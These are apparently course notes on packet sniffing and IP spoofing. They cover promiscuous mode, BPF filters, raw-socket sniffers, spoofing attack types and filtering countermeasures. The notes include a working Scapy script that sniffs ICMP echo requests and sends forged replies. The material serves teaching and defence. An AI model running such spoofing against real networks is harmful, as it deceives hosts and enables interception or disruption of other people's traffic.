Sniffing & Spoofing

  • sniffing: attacker eavesdrop on a physical network and capture packets transmitted over network

  • spoofing: attacker sends packages under false identity

  • machines connect to network through Network Interface Cards (NIC)

    • each NIC has a MAC address
    • every NIC will hear all frames on the wire
    • if destination matches MAC address, the frame is copied into kernel buffer (otherwise dropped)
    • CPU is interrupted and CPU copies card from buffer to a queue
    • based on protocol different callbacks (and then applications) will process data in queue
    • NIC can be run in promiscuous mode to not drop frames that do not match MAC address

  • WiFi devices face interference from other nearby devices: access points connect wifi devices to different channels, to reduce effect of interference

    • WiFi network cards also work over subset of frames: can miss information if it is over different channel
    • WiFi cards can be placed in monitor mode to capture more packets (but most wireless NICs do not support monitor mode or is disabled by manufacturer)

  • BSD Packet filter (BPF) in Unix systems can help filter out unwanted sniffed packets: usually only interested in packets of specific protocol etc.

    • user-based program can attack a filter to a socket, causing kernel to drop unwanted packets as soon as possible

  • packets sniffer programs allow capturing packets intended for different destination machines, across a network cable

    • very basic implementation flow, using raw sockets:
      1. create a raw socket
      2. choose the protocol (type of packets want to receive e.g. IP packets, or all)
      3. Enable promiscuous mode
      4. Wait for packets
    • Real tools: Wireshark

  • packet spoofing: some critical packet info is forged

    • tools: Netwox, Scapy (Python)
    • two major parts to implementing a spoofing program:
      1. constructing the packet
      2. fill in headers and payload
      3. UDP packets need payload data (TCP can be 0s)
      4. UDP packets checksum does not matter (usually ignored by OS)
      5. sending out the packet (use raw sockets, usually must be root)

  • attack with sniffing and spoofing: capture a packet first then construct a spoofed reply

Sniff and spoof example with scapy

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/python3
from scapy.all import *

def spoof_pkt(pkt):
  if ICMP in pkt and pkt[ICMP].type == 8:
     print("Original Packet.........")
     print("Source IP : ", pkt[IP].src)
     print("Destination IP :", pkt[IP].dst)

     ip = IP(src=pkt[IP].dst, dst=pkt[IP].src, ihl=pkt[IP].ihl)
     icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
     data = pkt[Raw].load
     newpkt = ip/icmp/data

     print("Spoofed Packet.........")
     print("Source IP : ", newpkt[IP].src)
     print("Destination IP :", newpkt[IP].dst)

     send(newpkt,verbose=0)

pkt = sniff(filter='icmp and src host 10.0.2.69',prn=spoof_pkt)

  • IP spoofing: technique used to gain unauthorized access to computers

    • attacker forges message to seem like it is coming from a trusted source (can be internal IP)
    • attacker may be inside or outside network
    • usual goals:
      • inject malicious data or commands into an existing stream of data
      • change routing tables to point to spoofed address to allow attacker to receive all network packets addressed to the spoofed address, and be able to reply as trusted user
    • IP spoofing is easy: routers only look at destination address, forging packets is easy, etc.

  • Types of spoofing attacks

    • non-blind spoofing: attacker is on the same subnet as target; can see sequence of ack packets
    • blind spoofing: takes place from outside where acks numbers are unreachable; attacker sends many packets to sample the sequence number
    • man-in-the-middle: communication hijacking - intercepting communication between two hosts to eliminate of alter the information
    • denial-of-service: consuming bandwidth and flooding the target with (possibly spoofed) packets
    • smurf attack: send ICMP ping over LAN with spoofed IP source address: will broadcast to all hosts on the LAN

  • Spoofing IP address can lead to unauthorized access (root access) then gaining access to remote hosts

  • Monitoring: look for packets on external interface with dest/src address that is local
  • Countermeasures: filtering router that does not allow internal source address (also in reverse to prevent spoofing originating from own site)